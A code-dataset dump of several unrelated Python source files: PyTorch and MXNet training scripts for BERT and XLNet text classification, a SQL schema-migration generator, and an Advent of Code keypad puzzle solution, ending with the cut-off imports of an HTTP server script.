# pred = torch.masked_select(sentence, mask)\n # sellabels = torch.masked_select(labels, mask)\n # print(\"og words\",self.tokenizer.decode(sellabels))\n # print(\"pred words\",self.tokenizer.decode(pred))\n \n if i % np.max((1,int(steps*0.001))) == 0:\n wandb.log({\"loss\": runinngloss / stepsperloss})\n wandb.log({\"lr\": self.scheduler.get_last_lr()[0]})\n with torch.no_grad():\n y_pred = torch.argmax(output,dim = -1)\n acc = torch.sum(y_pred == labels)\n wandb.log({\"acc\": acc.item()/self.batch_size})\n print( runinngloss/ stepsperloss, \"at\", i , \"of\", steps, \"time per step\",time.time()-start, \"estimated time until end of epoch\", (steps -i) * (time.time()-start))\n runinngloss = 0.0\n stepsperloss = 0 \n if not checkpoint_pth == None and i % np.max((1,int(steps*0.1))) == 0:\n torch.save(self, checkpoint_pth)\n if i >= steps:\n break\n\n\n def oldfit(self,X,y, epochs, num_classes):\n self.create_new_head(num_classes)\n self.scheduler =CosineWarmupScheduler(optimizer= self.optimizer, \n warmup = math.ceil(len(X)*epochs *0.01 / self.batch_size) ,\n max_iters = math.ceil(len(X)*epochs / self.batch_size))\n self.mode = \"cls\"\n wandb.init(project=\"my-test-project\")\n wandb.config = {\n \"learning_rate\": self.lr,\n \"num_layers\": self.num_layers,\n \"num_classes\": num_classes,\n \"batch_size\": self.batch_size\n }\n wandb.watch(self)\n for e in range(epochs):\n print(\"at epoch\", e)\n runinngloss = 0.0\n stepsperloss = 0\n for i in range(math.ceil(len(X) / self.batch_size)):\n start = time.time()\n ul = min((i+1) * self.batch_size, len(X))\n batch_x = X[i*self.batch_size: ul]\n batch_y = y[i*self.batch_size: ul]\n batch_x = self.tokenizer(batch_x, return_tensors=\"pt\", padding=self.padding, max_length = 256, truncation = True)\n\n batch_y = batch_y.to(device)\n batch_x = batch_x.to(device)\n self.optimizer.zero_grad()\n # print(batch_x)\n # print(batch_y)\n y_pred,_ = self(batch_x[\"input_ids\"], mask = batch_x[\"attention_mask\"],token_type_ids = batch_x[\"token_type_ids\"])\n # print(y_pred.shape)\n # print(y_pred)\n # print(batch_y)\n loss = self.loss(y_pred, batch_y) \n loss.backward()\n\n runinngloss += loss.item()\n stepsperloss += 1\n self.optimizer.step()\n self.scheduler.step()\n if i % np.max((1,int((len(X)/self.batch_size)*0.001))) == 0:\n wandb.log({\"loss\": runinngloss / stepsperloss})\n # print(\"lr\", self.scheduler.get_last_lr())\n wandb.log({\"lr\": self.scheduler.get_last_lr()[0]})\n with torch.no_grad():\n y_pred = torch.argmax(y_pred,dim = -1)\n acc = torch.sum(y_pred == batch_y)\n wandb.log({\"acc\": acc.item()/self.batch_size})\n print( runinngloss/ stepsperloss, \"at\", ul , \"of\", len(X), \"time per step\",time.time()-start, \"estimated time until end of epoch\", (math.ceil(len(X) / self.batch_size) -i) * (time.time()-start))\n runinngloss = 0.0\n stepsperloss = 0\n\n def fit(self,X,y, epochs, num_classes):\n self.create_new_head(num_classes)\n self.scheduler =CosineWarmupScheduler(optimizer= self.optimizer, \n warmup = math.ceil(len(X)*epochs *0.01 / self.batch_size) ,\n max_iters = math.ceil(len(X)*epochs / self.batch_size))\n self.mode = \"cls\"\n wandb.init(project=\"my-test-project\")\n wandb.config = {\n \"learning_rate\": self.lr,\n \"num_layers\": self.num_layers,\n \"num_classes\": num_classes,\n \"batch_size\": self.batch_size\n }\n wandb.watch(self)\n for e in range(epochs):\n print(\"at epoch\", e)\n runinngloss = 0.0\n stepsperloss = 0\n for i in range(math.ceil(len(X) / self.batch_size)):\n start = time.time()\n ul = min((i+1) * self.batch_size, len(X))\n batch_x = X[i*self.batch_size: ul]\n batch_y = y[i*self.batch_size: ul]\n batch_x = self.tokenizer(batch_x, return_tensors=\"pt\", padding=self.padding, max_length = 256, truncation = True)\n\n batch_y = batch_y.to(device)\n batch_x = batch_x.to(device)\n self.optimizer.zero_grad()\n # print(batch_x)\n # print(batch_y)\n y_pred = self(batch_x[\"input_ids\"], mask = batch_x[\"attention_mask\"].bool(),token_type_ids = batch_x[\"token_type_ids\"])\n # print(y_pred.shape)\n # print(y_pred)\n # print(batch_y)\n loss = self.loss(y_pred, batch_y) \n loss.backward()\n\n runinngloss += loss.item()\n stepsperloss += 1\n self.optimizer.step()\n self.scheduler.step()\n if i % np.max((1,int((len(X)/self.batch_size)*0.001))) == 0:\n wandb.log({\"loss\": runinngloss / stepsperloss})\n # print(\"lr\", self.scheduler.get_last_lr())\n wandb.log({\"lr\": self.scheduler.get_last_lr()[0]})\n with torch.no_grad():\n y_pred = torch.argmax(y_pred,dim = -1)\n acc = torch.sum(y_pred == batch_y)\n wandb.log({\"acc\": acc.item()/self.batch_size})\n print( runinngloss/ stepsperloss, \"at\", ul , \"of\", len(X), \"time per step\",time.time()-start, \"estimated time until end of epoch\", (math.ceil(len(X) / self.batch_size) -i) * (time.time()-start))\n runinngloss = 0.0\n stepsperloss = 0\n\n\n @torch.no_grad()\n def evaluate(self,X,y):\n acc = 0.0\n for i in range(math.ceil(len(X) / self.batch_size)):\n start = time.time()\n ul = min((i+1) * self.batch_size, len(X))\n batch_x = X[i*self.batch_size: ul]\n batch_y = y[i*self.batch_size: ul]\n batch_x = self.tokenizer(batch_x, return_tensors=\"pt\", padding=self.padding, max_length = 256, truncation = True)\n\n batch_y = batch_y.to(device)\n batch_x = batch_x.to(device)\n y_pred = self(batch_x[\"input_ids\"], mask = batch_x[\"attention_mask\"].bool(),token_type_ids = batch_x[\"token_type_ids\"])\n y_pred = torch.argmax(y_pred,dim = -1)\n acc = acc + torch.sum(y_pred == batch_y)\n\n acc = acc / len(X)\n return acc.item()\n\n \n \n\n\n\n \n\n \n\n\n","repo_name":"TheMody/POWERBERT","sub_path":"embedder.py","file_name":"embedder.py","file_ext":"py","file_size_in_byte":24360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22787264819","text":"\"\"\"\nSentence Pair Classification with XLNet\n\"\"\"\nimport io\nimport os\nimport time\nimport argparse\nimport random\nimport logging\nimport warnings\nimport sys\nfrom functools import partial\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import gluon\nimport gluonnlp as nlp\nfrom model.XLNet_classifier import XLNetClassifier\nfrom transformer import model\n\npath = sys.path[0]\nsys.path.append(path + '/../bert/data')\n#pylint: disable=wrong-import-position\nfrom classification import MRPCTask, QQPTask, RTETask, STSBTask, SSTTask, \\\n QNLITask, CoLATask, MNLITask, WNLITask, XNLITask, LCQMCTask, ChnSentiCorpTask\nfrom preprocessing_utils import truncate_seqs_equal, concat_sequences\n\ntasks = {\n 'MRPC': MRPCTask(),\n 'QQP': QQPTask(),\n 'QNLI': QNLITask(),\n 'RTE': RTETask(),\n 'STS-B': STSBTask(),\n 'CoLA': CoLATask(),\n 'MNLI': MNLITask(),\n 'WNLI': WNLITask(),\n 'SST': SSTTask(),\n 'XNLI': XNLITask(),\n 'LCQMC': LCQMCTask(),\n 'ChnSentiCorp': ChnSentiCorpTask()\n}\n\nparser = argparse.ArgumentParser(\n description='XLNet fine-tune examples for classification/regression tasks.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n# Training config\nparser.add_argument('--epochs', type=int, default=3, help='number of epochs.')\nparser.add_argument('--training_steps',\n type=int,\n help='If specified, epochs will be ignored.')\nparser.add_argument(\n '--batch_size',\n type=int,\n default=128,\n help='Batch size. Number of examples per gpu in a minibatch.')\n\nparser.add_argument(\n '--accumulate',\n type=int,\n default=None,\n help=\n 'The number of batches for gradients accumulation to simulate large batch size. '\n 'Default is None')\n\nparser.add_argument('--dev_batch_size',\n type=int,\n default=32,\n help='Batch size for dev set and test set')\n\nparser.add_argument('--dropout', type=float, default=0.1, help='dropout')\nparser.add_argument('--attention_dropout',\n type=float,\n default=0.1,\n help='attention dropout')\nparser.add_argument('--log_interval',\n type=int,\n default=10,\n help='report interval')\nparser.add_argument(\n '--early_stop',\n type=int,\n default=None,\n help='Whether to perform early stopping based on the metric on dev set. '\n 'The provided value is the patience. ')\n\n# Optimizer config\nparser.add_argument('--optimizer', type=str, default='Adam', help='')\nparser.add_argument('--lr',\n type=float,\n default=3e-5,\n help='Initial learning rate')\nparser.add_argument('--lr_decay',\n type=str,\n choices=['linear'],\n default='linear',\n help='lr schedule')\nparser.add_argument('--epsilon',\n type=float,\n default=1e-6,\n help='Small value to avoid division by 0')\nparser.add_argument(\n '--warmup_ratio',\n type=float,\n default=0,\n help='ratio of warmup steps used in NOAM\\'s stepsize schedule')\n\n# task spesific & data preprocessing\nparser.add_argument('--gpu',\n type=int,\n default=None,\n help='Number of gpus for finetuning.')\nparser.add_argument('--task_name',\n default='MRPC',\n type=str,\n help='The name of the task to fine-tune.')\n\nparser.add_argument(\n '--model_name',\n type=str,\n default='xlnet_cased_l12_h768_a12',\n choices=['xlnet_cased_l24_h1024_a16', 'xlnet_cased_l12_h768_a12'],\n help='The name of pre-trained XLNet model to fine-tune')\n\nparser.add_argument('--dataset',\n type=str,\n default='126gb',\n help='The dataset BERT pre-trained with.')\nparser.add_argument('--max_len',\n type=int,\n default=128,\n help='Maximum length of the sentence pairs')\n\nparser.add_argument(\n '--round_to', type=int, default=None,\n help='The length of padded sequences will be rounded up to be multiple of this argument.'\n 'When round to is set to 8, training throughput may increase for mixed precision'\n 'training on GPUs with tensorcores.')\n\nparser.add_argument(\n '--only_inference',\n action='store_true',\n help=\n 'If set, we skip training and only perform inference on dev and test data.'\n)\n\n# Initializing config\nparser.add_argument('--seed', type=int, default=2, help='Random seed')\n\n# I/O config\nparser.add_argument(\n '--output_dir',\n type=str,\n default='./output_dir',\n help='The output directory where the model params will be written.')\nparser.add_argument(\n '--model_parameters',\n type=str,\n default=None,\n help='A parameter file for the model that is loaded into the model'\n ' before training/inference. It is different from the parameter'\n ' file written after the model is trained.')\n\nargs = parser.parse_args()\n\n\ndef split_array(arr, num_of_splits):\n \"\"\"split an array into equal pieces\"\"\"\n # TODO Replace this function with gluon.utils.split_data() once targeting MXNet 1.7\n size = arr.shape[0]\n if size < num_of_splits:\n return [arr[i:i + 1] for i in range(size)]\n slice_len, rest = divmod(size, num_of_splits)\n div_points = [0] + [(slice_len * index + min(index, rest) + slice_len +\n (index < rest)) for index in range(num_of_splits)]\n slices = [\n arr[div_points[i]:div_points[i + 1]] for i in range(num_of_splits)\n ]\n return slices\n\n\ndef split_and_load(arrs, _ctxs):\n \"\"\"split and load arrays to a list of contexts\"\"\"\n # TODO Replace split_array() with gluon.utils.split_data() once targeting MXNet 1.7\n assert isinstance(arrs, (list, tuple))\n # split and load\n loaded_arrs = [[\n i.as_in_context(ctx)\n for i, ctx in zip(split_array(arr, len(_ctxs)), _ctxs)\n ] for arr in arrs]\n return zip(*loaded_arrs)\n\n\ndef convert_examples_to_features(example,\n tokenizer=None,\n truncate_length=512,\n cls_token=None,\n sep_token=None,\n class_labels=None,\n label_alias=None,\n vocab=None,\n is_test=False):\n #pylint: disable=redefined-outer-name\n \"\"\"convert glue examples into necessary features\"\"\"\n assert vocab\n if not is_test:\n label_dtype = 'int32' if class_labels else 'float32'\n # get the label\n label = example[-1]\n example = example[:-1]\n #create label maps if classification task\n if class_labels:\n label_map = {}\n for (i, l) in enumerate(class_labels):\n label_map[l] = i\n if label_alias:\n for key in label_alias:\n label_map[key] = label_map[label_alias[key]]\n label = label_map[label]\n label = np.array([label], dtype=label_dtype)\n\n # tokenize raw text\n tokens_raw = [tokenizer(l) for l in example]\n # truncate to the truncate_length,\n tokens_trun = truncate_seqs_equal(tokens_raw, truncate_length)\n # concate the sequences with special tokens, cls_token is added to the end in XlNet\n special_tokens = [[sep_token]] * len(tokens_trun) + [[cls_token]]\n tokens, segment_ids, _ = concat_sequences(tokens_trun, special_tokens)\n # convert the token to ids\n input_ids = vocab[tokens]\n valid_length = len(input_ids)\n if not is_test:\n return input_ids, valid_length, segment_ids, label\n else:\n return input_ids, valid_length, segment_ids\n\n\ndef preprocess_data(_tokenizer,\n _task,\n batch_size,\n dev_batch_size,\n max_len,\n _vocab):\n \"\"\"Train/eval Data preparation function.\"\"\"\n label_dtype = 'int32' if _task.class_labels else 'float32'\n truncate_length = max_len - 3 if _task.is_pair else max_len - 2\n trans = partial(convert_examples_to_features,\n tokenizer=_tokenizer,\n truncate_length=truncate_length,\n cls_token=_vocab.cls_token,\n sep_token=_vocab.sep_token,\n class_labels=_task.class_labels,\n label_alias=_task.label_alias,\n vocab=_vocab)\n\n # data train\n # task.dataset_train returns (segment_name, dataset)\n train_tsv = _task.dataset_train()[1]\n data_train = list(map(trans, train_tsv))\n data_train = mx.gluon.data.SimpleDataset(data_train)\n data_train_len = data_train.transform(\n lambda _, valid_length, segment_ids, label: valid_length, lazy=False)\n\n # bucket sampler for training\n pad_val = _vocab[_vocab.padding_token]\n batchify_fn = nlp.data.batchify.Tuple(\n nlp.data.batchify.Pad(axis=0, pad_val=pad_val, round_to=args.round_to), # input\n nlp.data.batchify.Stack(), # length\n nlp.data.batchify.Pad(axis=0, pad_val=4, round_to=args.round_to), # segment\n nlp.data.batchify.Stack(label_dtype)) # label\n batch_sampler = nlp.data.sampler.FixedBucketSampler(data_train_len,\n batch_size=batch_size,\n num_buckets=10,\n ratio=0,\n shuffle=True)\n # data loader for training\n loader_train = gluon.data.DataLoader(dataset=data_train,\n num_workers=4,\n batch_sampler=batch_sampler,\n batchify_fn=batchify_fn)\n\n # data dev. For MNLI, more than one dev set is available\n dev_tsv = _task.dataset_dev()\n dev_tsv_list = dev_tsv if isinstance(dev_tsv, list) else [dev_tsv]\n loader_dev_list = []\n for segment, data in dev_tsv_list:\n data_dev = mx.gluon.data.SimpleDataset(list(map(trans, data)))\n loader_dev = mx.gluon.data.DataLoader(data_dev,\n batch_size=dev_batch_size,\n num_workers=4,\n shuffle=False,\n batchify_fn=batchify_fn)\n loader_dev_list.append((segment, loader_dev))\n\n # batchify for data test\n test_batchify_fn = nlp.data.batchify.Tuple(\n nlp.data.batchify.Pad(axis=0, pad_val=pad_val, round_to=args.round_to),\n nlp.data.batchify.Stack(),\n nlp.data.batchify.Pad(axis=0, pad_val=0, round_to=args.round_to))\n\n # transform for data test\n test_trans = partial(convert_examples_to_features,\n tokenizer=_tokenizer,\n truncate_length=max_len,\n cls_token=_vocab.cls_token,\n sep_token=_vocab.sep_token,\n class_labels=None,\n is_test=True,\n vocab=_vocab)\n\n # data test. For MNLI, more than one test set is available\n test_tsv = _task.dataset_test()\n test_tsv_list = test_tsv if isinstance(test_tsv, list) else [test_tsv]\n loader_test_list = []\n for segment, data in test_tsv_list:\n data_test = mx.gluon.data.SimpleDataset(list(map(test_trans, data)))\n loader_test = mx.gluon.data.DataLoader(data_test,\n batch_size=dev_batch_size,\n num_workers=4,\n shuffle=False,\n batchify_fn=test_batchify_fn)\n loader_test_list.append((segment, loader_test))\n return loader_train, loader_dev_list, loader_test_list, len(data_train)\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogging.captureWarnings(True)\nhandler = logging.FileHandler('log_{0}.txt'.format(args.task_name))\nhandler.setLevel(logging.INFO)\nhandler2 = logging.StreamHandler()\nhandler2.setLevel(logging.INFO)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nhandler2.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.addHandler(handler2)\nlogging.info(args)\n\nlog_interval = args.log_interval * args.accumulate if args.accumulate else args.log_interval\n\nif args.accumulate:\n logging.info('Using gradient accumulation. Effective batch size = ' \\\n 'batch_size * accumulate = %d', args.accumulate * args.batch_size)\n\n# random seed\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\nmx.random.seed(args.seed)\n\nnum_workers = 0\nctxs = [mx.cpu(0)] if not args.gpu else [mx.gpu(i) for i in range(args.gpu)]\n\ntask = tasks[args.task_name]\n\n# model and loss\nif args.only_inference and not args.model_parameters:\n warnings.warn('model_parameters is not set. '\n 'Randomly initialized model will be used for inference.')\n\nget_pretrained = True\n\nget_model_params = {\n 'name': args.model_name,\n 'dataset_name': args.dataset,\n 'pretrained': get_pretrained,\n 'ctx': ctxs,\n 'use_decoder': False,\n 'dropout': args.dropout,\n 'attention_dropout': args.attention_dropout\n}\n\nxlnet_base, vocab, tokenizer = model.get_model(**get_model_params)\n# initialize the rest of the parameters\ninitializer = mx.init.Normal(0.02)\n\ndo_regression = not task.class_labels\nif do_regression:\n num_classes = 1\n loss_function = gluon.loss.L2Loss()\nelse:\n num_classes = len(task.class_labels)\n loss_function = gluon.loss.SoftmaxCELoss()\n# reuse the XLnetClassifier class with num_classes=1 for regression\nmodel = XLNetClassifier(xlnet_base,\n units=xlnet_base._net._units,\n dropout=0.1,\n num_classes=num_classes)\n\nnum_ctxes = len(ctxs)\n\n# initialize classifier\nif not args.model_parameters:\n model.classifier.initialize(init=initializer, ctx=ctxs)\n model.pooler.initialize(init=initializer, ctx=ctxs)\n\n# load checkpointing\noutput_dir = args.output_dir\n\nif args.model_parameters:\n logging.info('loading model params from %s', args.model_parameters)\n nlp.utils.load_parameters(model,\n args.model_parameters,\n ctx=ctxs,\n cast_dtype=True)\n\nnlp.utils.mkdir(output_dir)\n\nlogging.debug(model)\nmodel.hybridize(static_alloc=True)\nloss_function.hybridize(static_alloc=True)\n\nlogging.info('processing dataset...')\ntrain_data, dev_data_list, test_data_list, num_train_examples = preprocess_data(\n tokenizer, task, args.batch_size, args.dev_batch_size, args.max_len, vocab)\n\n\ndef test(loader_test, segment):\n \"\"\"Inference function on the test dataset.\"\"\"\n logging.info('Now we are doing testing on %s with %s.', segment, ctxs)\n\n tic = time.time()\n results = []\n for _, seqs in enumerate(loader_test):\n #input_ids, valid_length, segment_ids = seqs\n data_list = list(split_and_load(seqs, ctxs))\n out_list = []\n for splited_data in data_list:\n input_ids, valid_length, segment_ids = splited_data\n out = model(input_ids, segment_ids, valid_length=valid_length)\n out_list.append(out)\n out_list = np.vstack([o.asnumpy() for o in out_list])\n if not task.class_labels:\n # regression task\n for result in out_list.reshape(-1).tolist():\n results.append('{:.3f}'.format(result))\n else:\n # classification task\n out = out_list.reshape(-1, out_list.shape[-1])\n indices = out.argmax(axis=-1)\n for index in indices:\n results.append(task.class_labels[int(index)])\n\n mx.nd.waitall()\n toc = time.time()\n logging.info('Time cost=%.2fs, throughput=%.2f samples/s', toc - tic,\n args.dev_batch_size * len(loader_test) / (toc - tic))\n # write result to a file.\n segment = segment.replace('_mismatched', '-mm')\n segment = segment.replace('_matched', '-m')\n segment = segment.replace('SST', 'SST-2')\n filename = args.task_name + segment.replace('test', '') + '.tsv'\n test_path = os.path.join(args.output_dir, filename)\n with io.open(test_path, 'w', encoding='utf-8') as f:\n f.write(u'index\\tprediction\\n')\n for i, pred in enumerate(results):\n f.write(u'%d\\t%s\\n' % (i, str(pred)))\n\n\ndef log_metric(metric, is_training=True):\n prefix = 'training' if is_training else 'validation'\n metric_nm, metric_val = metric.get()\n if not isinstance(metric_nm, list):\n metric_nm, metric_val = [metric_nm], [metric_val]\n logging_str = prefix + ' metrics:' + ','.join(\n [i + ':%.4f' for i in metric_nm])\n logging.info(logging_str, *metric_val)\n return metric_nm, metric_val\n\n\ndef log_train(batch_id, batch_num, step_loss, _log_interval, epoch_id,\n learning_rate):\n \"\"\"Generate and print out the log message for training. \"\"\"\n train_str = '[Epoch %d Batch %d/%d] loss=%.4f, lr=%.7f'\n logging.info(train_str, epoch_id + 1, batch_id + 1, batch_num,\n step_loss / _log_interval, learning_rate)\n\n\ndef log_eval(batch_id, batch_num, step_loss, _log_interval):\n \"\"\"Generate and print out the log message for inference. \"\"\"\n eval_str = '[Batch %d/%d] loss=%.4f'\n logging.info(eval_str, batch_id + 1, batch_num, step_loss / _log_interval)\n\n\ndef train(metric):\n \"\"\"Training function.\"\"\"\n if not args.only_inference:\n logging.info('Now we are doing XLNet classification training on %s!',\n ctxs)\n\n all_model_params = model.collect_params()\n optimizer_params = {\n 'learning_rate': args.lr,\n 'epsilon': args.epsilon,\n 'wd': 0\n }\n trainer = gluon.Trainer(all_model_params,\n args.optimizer,\n optimizer_params,\n update_on_kvstore=False)\n\n step_size = args.batch_size * args.accumulate if args.accumulate else args.batch_size\n num_train_steps = int(num_train_examples / step_size * args.epochs)\n epoch_number = args.epochs\n if args.training_steps:\n num_train_steps = args.training_steps\n epoch_number = 9999\n logging.info('training steps=%d', num_train_steps)\n warmup_ratio = args.warmup_ratio\n num_warmup_steps = int(num_train_steps * warmup_ratio)\n step_num = 0\n\n # Do not apply weight decay on LayerNorm and bias terms\n for _, v in model.collect_params('.*beta|.*gamma|.*bias').items():\n v.wd_mult = 0.0\n # Collect differentiable parameters\n params = [p for p in all_model_params.values() if p.grad_req != 'null']\n\n # Set grad_req if gradient accumulation is required\n if args.accumulate and args.accumulate > 1:\n for p in params:\n p.grad_req = 'add'\n # track best eval score\n metric_history = []\n best_metric = None\n patience = args.early_stop\n\n tic = time.time()\n finish_flag = False\n for epoch_id in range(epoch_number):\n if args.early_stop and patience == 0:\n logging.info('Early stopping at epoch %d', epoch_id)\n break\n if finish_flag:\n break\n if not args.only_inference:\n metric.reset()\n step_loss = 0\n tic = time.time()\n all_model_params.zero_grad()\n for batch_id, seqs in enumerate(train_data):\n new_lr = args.lr\n # learning rate schedule\n if step_num < num_warmup_steps:\n new_lr = args.lr * step_num / num_warmup_steps\n elif args.lr_decay == 'linear':\n non_warmup_steps = step_num - num_warmup_steps\n offset = non_warmup_steps / (num_train_steps -\n num_warmup_steps)\n new_lr = max(0, args.lr - offset * args.lr)\n trainer.set_learning_rate(new_lr)\n batch_loss = []\n # forward and backward\n with mx.autograd.record():\n data_list = list(split_and_load(seqs, ctxs))\n for splited_data in data_list:\n input_ids, valid_length, segment_ids, label = splited_data\n out = model(input_ids,\n segment_ids,\n valid_length=valid_length)\n ls = loss_function(out, label).mean() / len(ctxs)\n batch_loss.append(ls)\n if args.accumulate:\n ls = ls / args.accumulate\n ls.backward()\n # update\n if not args.accumulate or (batch_id +\n 1) % args.accumulate == 0:\n trainer.allreduce_grads()\n nlp.utils.clip_grad_global_norm(params, 1)\n trainer.update(args.accumulate if args.accumulate else 1,\n ignore_stale_grad=True)\n step_num += 1\n if args.accumulate and args.accumulate > 1:\n # set grad to zero for gradient accumulation\n all_model_params.zero_grad()\n if batch_id == 0 and epoch_id == 0:\n toc = time.time()\n logging.info(\n 'Time cost for the first forward-backward =%.2fs',\n toc - tic)\n batch_loss = sum([ls.asscalar() for ls in batch_loss])\n step_loss += batch_loss\n if (batch_id + 1) % (args.log_interval) == 0:\n log_train(batch_id, len(train_data), step_loss,\n args.log_interval, epoch_id,\n trainer.learning_rate)\n step_loss = 0\n if step_num >= num_train_steps:\n logging.info('Finish training step: %d', step_num)\n finish_flag = True\n break\n\n mx.nd.waitall()\n\n # inference on dev data\n for segment, dev_data in dev_data_list:\n metric_nm, metric_val = evaluate(dev_data, metric, segment)\n if best_metric is None or metric_val >= best_metric:\n best_metric = metric_val\n patience = args.early_stop\n else:\n if args.early_stop is not None:\n patience -= 1\n metric_history.append((epoch_id, metric_nm, metric_val))\n\n if not args.only_inference:\n # save params\n ckpt_name = 'model_xlnet_{0}_{1}.params'.format(\n args.task_name, epoch_id)\n params_saved = os.path.join(output_dir, ckpt_name)\n nlp.utils.save_parameters(model, params_saved)\n logging.info('params saved in: %s', params_saved)\n toc = time.time()\n logging.info('Time cost=%.2fs', toc - tic)\n tic = toc\n\n if not args.only_inference:\n # we choose the best model based on metric[0],\n # assuming higher score stands for better model quality\n metric_history.sort(key=lambda x: x[2][0], reverse=True)\n epoch_id, metric_nm, metric_val = metric_history[0]\n ckpt_name = 'model_xlnet_{0}_{1}.params'.format(\n args.task_name, epoch_id)\n params_saved = os.path.join(output_dir, ckpt_name)\n nlp.utils.load_parameters(model, params_saved)\n metric_str = 'Best model at epoch {}. Validation metrics:'.format(\n epoch_id + 1)\n metric_str += ','.join([i + ':%.4f' for i in metric_nm])\n logging.info(metric_str, *metric_val)\n\n # inference on test data\n for segment, test_data in test_data_list:\n test(test_data, segment)\n print('finish test!')\n\n\ndef evaluate(loader_dev, metric, segment):\n \"\"\"Evaluate the model on validation dataset.\"\"\"\n logging.info('Now we are doing evaluation on %s with %s.', segment, ctxs)\n metric.reset()\n step_loss = 0\n tic = time.time()\n out_list = []\n label_list = []\n for batch_id, seqs in enumerate(loader_dev):\n batch_loss = []\n # forward and backward\n data_list = list(split_and_load(seqs, ctxs))\n for splited_data in data_list:\n input_ids, valid_length, segment_ids, label = splited_data\n out = model(input_ids, segment_ids, valid_length=valid_length)\n batch_loss.append(loss_function(out, label).mean() / len(ctxs))\n if not do_regression:\n label = label.reshape((-1))\n out_list.append(out.as_in_context(mx.cpu(0)))\n label_list.append(label.as_in_context(mx.cpu(0)))\n\n batch_loss = sum([ls.asscalar() for ls in batch_loss])\n step_loss += batch_loss\n if (batch_id + 1) % (args.log_interval) == 0:\n log_eval(batch_id, len(loader_dev), step_loss, args.log_interval)\n step_loss = 0\n\n label_list = mx.nd.concat(*label_list, dim=0)\n out_list = mx.nd.concat(*out_list, dim=0)\n metric.update([label_list], [out_list])\n metric_nm, metric_val = log_metric(metric, is_training=False)\n mx.nd.waitall()\n toc = time.time()\n logging.info('Time cost=%.2fs, throughput=%.2f samples/s', toc - tic,\n args.dev_batch_size * len(loader_dev) / (toc - tic))\n return metric_nm, metric_val\n\n\nif __name__ == '__main__':\n train(task.metrics)\n","repo_name":"UofT-EcoSystem/MXNet-GPU_Memory_Profiler","sub_path":"benchmarks/gluon-nlp/scripts/language_model/run_glue.py","file_name":"run_glue.py","file_ext":"py","file_size_in_byte":25933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"71017118761","text":"# coding: utf-8\n#!/usr/bin/env python\n\nimport json\n\n\nupdate_column_sql = \"\"\"\n-- cast column {table}.{column} to {cast}\nBEGIN;\n alter table {table} rename column {column} to {column}_x;\n alter table {table} add column {column} {cast};\n update {table} set {column} = {column}_x::{cast};\n alter table {table} drop column {column}_x;\nCOMMIT;\n\"\"\"\n\nreplace_empty_sql = \"\"\"\n--- update empty values for {table}.{column}\nUPDATE {table} SET {column} = NULL WHERE {column} = '';\n\"\"\"\n\n\ndef update_column(table, column, cast):\n \"\"\"Привести данные в столбце к нужному типу данных.\"\"\"\n return update_column_sql.format(table=table, column=column, cast=cast)\n\n\ndef null(table, column):\n \"\"\"Установить пустые значения в колонке в NULL.\"\"\"\n return replace_empty_sql.format(table=table, column=column)\n\n\nif __name__=='__main__':\n\n sql = []\n\n spec = json.load(open('schema.json', 'r'))\n tables_to_process = spec['process_tables']\n for table, task in spec['schema'].items():\n if table in tables_to_process:\n sql.append(\n \"\\n--============ {} ============--\\n\".format(table.upper()))\n for column in task.get('null', []):\n sql.append(null(table, column))\n for column, cast in sorted(task.get('convert', {}).items()):\n sql.append(update_column(table, column, cast))\n\n with open('update_schema.sql', 'w') as f:\n f.writelines(sql)\n","repo_name":"asyncee/fias2pgsql","sub_path":"update_schema.py","file_name":"update_schema.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"18"} +{"seq_id":"21506590694","text":"# Declaration of variables\ninstructions = []\n\n# Read input\nfile_obj = open('d2_input.txt', 'r')\nfor line in file_obj:\n instructions.append(line.strip())\nfile_obj.close()\n\n# Part one\n\n# 1 2 3\n# 4 5 6\n# 7 8 9\n\nkeypad = [[7, 8, 9],\n [4, 5, 6],\n [1, 2, 3]]\n\n# y 2\n# y 1 +\n# y 0 1 2\n# x x x\n\ncurPosX = 1\ncurPosY = 1\n\n# Part two\n\n# 1\n# 2 3 4\n# 5 6 7 8 9\n# A B C\n# D\n\np2keypad = [['x', 'x', 'D', 'x', 'x'],\n ['x', 'A', 'B', 'C', 'x'],\n [5, 6, 7, 8, 9],\n ['x', 2, 3, 4, 'x'],\n ['x', 'x', 1, 'x', 'x']]\n\n# y 4\n# y 3\n# y 2 +\n# y 1\n# y 0 1 2 3 4\n# x x x x x\n\np2curPosX = 2\np2curPosY = 2\n\ncode = \"\"\np2code = \"\"\n\nfor instruction in instructions:\n if instruction != \"\":\n for char in instruction:\n\n # Part one\n if (char.lower() == 'u' and curPosY < 2):\n curPosY = curPosY +1\n elif (char.lower() == 'd' and curPosY > 0):\n curPosY = curPosY -1\n elif (char.lower() == 'l' and curPosX > 0):\n curPosX = curPosX -1\n elif (char.lower() == 'r' and curPosX < 2):\n curPosX = curPosX +1\n\n # Part two\n if (char.lower() == 'u' and p2curPosY < 4 and p2keypad[p2curPosY+1][p2curPosX] != 'x'):\n p2curPosY = p2curPosY +1\n elif (char.lower() == 'd' and p2curPosY > 0 and p2keypad[p2curPosY-1][p2curPosX] != 'x'):\n p2curPosY = p2curPosY -1\n elif (char.lower() == 'r' and p2curPosX < 4 and p2keypad[p2curPosY][p2curPosX+1] != 'x'):\n p2curPosX = p2curPosX +1\n elif (char.lower() == 'l' and p2curPosX > 0 and p2keypad[p2curPosY][p2curPosX-1] != 'x'):\n p2curPosX = p2curPosX -1\n\n code = code + str(keypad[curPosY][curPosX])\n p2code = p2code + str(p2keypad[p2curPosY][p2curPosX])\nprint(\"The code for part one is: \" + code)\nprint(\"The code for part two is: \" + p2code)\n","repo_name":"anthorne/advent-of-code_2016","sub_path":"d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36370355090","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib import parse\nimport hashlib\nimport 